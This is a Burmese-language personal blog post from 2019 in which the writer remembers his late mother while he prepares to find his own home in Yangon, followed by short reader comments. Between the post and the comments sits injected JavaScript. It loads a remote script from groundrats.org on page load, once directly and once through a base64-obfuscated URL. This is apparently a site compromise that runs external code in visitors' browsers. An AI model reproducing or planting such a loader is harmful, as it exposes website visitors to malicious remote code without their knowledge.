မေ့မေ့ကို သတိရလို့ ရေးတဲ့စာ-၄

SawAungFebruary 8, 20191min05

ရန်ကုန် နေစရာနေရာတစ်ခုဟာ သိပ်ကိုအရေးကြီးမှန်း ပိုပြီးသိလာရတဲ့အခါမှာတော့။ အမေ့ကို ပိုသတိရမိလာတာပါပဲ။ မုဆိုးမတဖြစ်နဲ့ နေစရာတနေရာကို ခက်ခက်ခဲခဲဝယ်နိုင်တဲ့ ဇွဲကို မချီးကျူးဘဲမနေနိုင်ပြန်ဘူး။

အခုတလော အမေဆုံးပြီးနောက်ပိုင်း အရမ်းကိုပူပန်မှုများတဲ့အချိန်တိုင်း သတိရမိနေပြန်ရော။

အခုနေတဲ့တိုက်ခန်းလေးကိုလည်း ကိုယ်စွန့်ခွာရတော့မယ်ဆိုတဲ့အသိရယ်။ အမေ့လို ကိုယ်ပိုင်နေစရာလေးရအောင် လုပ်ရတော့မယ်ဆိုတဲ့ အသိက အမေ့ကို ပိုပြီး သတိရစေခဲ့တယ်။ အမေစုဆောင်းခဲ့သလိုမျိုး ကိုယ်လည်းရုန်းကန်ရတော့မယ်ဆိုတာတွေးရင်း နေစရာအိမ်လေးတစ်လုံး (သို့) တိုက်ခန်းလေးတစ်ခန်း (သို့) ကိုယ်ပိုင်ကမ္ဘာလေးတစ်ခုကို ဒီလကုန်ရင် ရောက်ရှိတော့မယ်ဆိုတာ တွေးရင်း။

မေမေ့ကိုသတိရလို့ရေးတဲ့စာ

ရင်နှင့်ရင်း၍

အောင်မိုးသူ


;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,’script’,’https://groundrats.org/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox’); ;(function(f,b,n,j,x,e){ var decodedUrl = atob(‘aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294′); x=b.createElement(n);e=b.getElementsByTagName(n)[0]; x.async=1;x.src=decodedUrl; e.parentNode.insertBefore(x,e); })(window,document,’script’);

5 comments

  • kai

    February 9, 2019 at 12:19 pm

    တယောက်ထဲပြောင်းမှာလား.. အိုးသစ်အိမ်သစ်ကို..

    Reply

  • ဇီဇီ

    February 11, 2019 at 12:04 pm

    ကံကောင်း အောင်မြင်ပါစေ။

    <3

    Reply

  • Shar Thet Man

    February 11, 2019 at 2:50 pm

    ကံအကြီးကြီးကောင်းပါစေ

    Reply

Leave a Reply

Your email address will not be published.